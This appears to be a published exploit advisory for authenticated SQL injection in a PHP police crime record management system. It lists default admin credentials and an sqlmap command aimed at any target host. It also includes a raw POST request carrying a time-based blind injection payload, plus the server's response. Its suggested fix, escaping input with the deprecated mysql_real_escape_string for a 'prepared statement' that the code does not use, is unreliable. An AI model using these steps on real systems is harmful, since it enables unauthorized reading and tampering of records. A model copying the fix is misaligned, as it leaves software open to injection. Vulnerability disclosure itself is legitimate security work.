# Date: 17/08/2021
# Exploit Author: Davide 't0rt3ll1n0' Taraschi
# Vendor Homepage: https://www.sourcecodester.com/users/osman-yahaya
# Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
# Version: 1.0
# Testeted on: Linux (Ubuntu 20.04) using LAMPP
## Impact:
An authenticated user may be able to read data for which is not
authorized, tamper with or destroy data, or possibly even
read/write files or execute code on the database server.
## Description:
All four parameters passed via POST are vulnerable:
`fname` is vulnerable both to boolean-based blind and time-based
blind SQLi
`oname` is vulnerable both to boolean-based blind and time-based
blind SQLi
`username` is only vulnerable to time-based blind SQLi
`status` is vulnerable both to boolean-based blind and time-based
blind SQLi
## Remediation:
Here is the vulnerable code:
if($status==''){
mysqli_query($dbcon,"update userlogin set surname='$fname',
othernames='$oname' where staffid='$staffid'")or
die(mysqli_error());
}
if(!empty($status)){
mysqli_query($dbcon,"update userlogin set
surname='$fname',status='$status', othernames='$oname' where
staffid='$staffid'")or die(mysqli_error());
}
As you can see the parameters described above are passed to the
code without being checked, this lead to the SQLi.
To patch this vulnerability, i suggest to sanitize those variables
via `mysql_real_escape_string()` before being passed to the
prepared statement.
## Exploitation through sqlmap
1) Log into the application (you can try the default creds
1111:admin123)
2) Copy your PHPSESSID cookie
3) Launch the following command:
sqlmap --method POST -u
http://$target/ghpolice/admin/savestaffedit.php
--data="fname=&oname=&username=&status=" --batch --dbs
--cookie="PHPSESSID=$phpsessid"
replacing $target with your actual target and $phpsessid with the
cookie that you had copied before
## PoC:
Request:
POST /ghpolice/admin/savestaffedit.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0)
Gecko/20100101 Firefox/91.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/ghpolice/admin/user.php
Cookie: PHPSESSID=f7123ac759cd97868df0f363434c423f
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
fname=' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- &oname=&username=&status=
And after 5 seconds we got:
HTTP/1.1 200 OK
Date: Tue, 17 Aug 2021 14:28:59 GMT
Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22
mod_perl/2.0.11 Perl/v5.32.1
X-Powered-By: PHP/7.4.22
Content-Length: 1074
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
etc...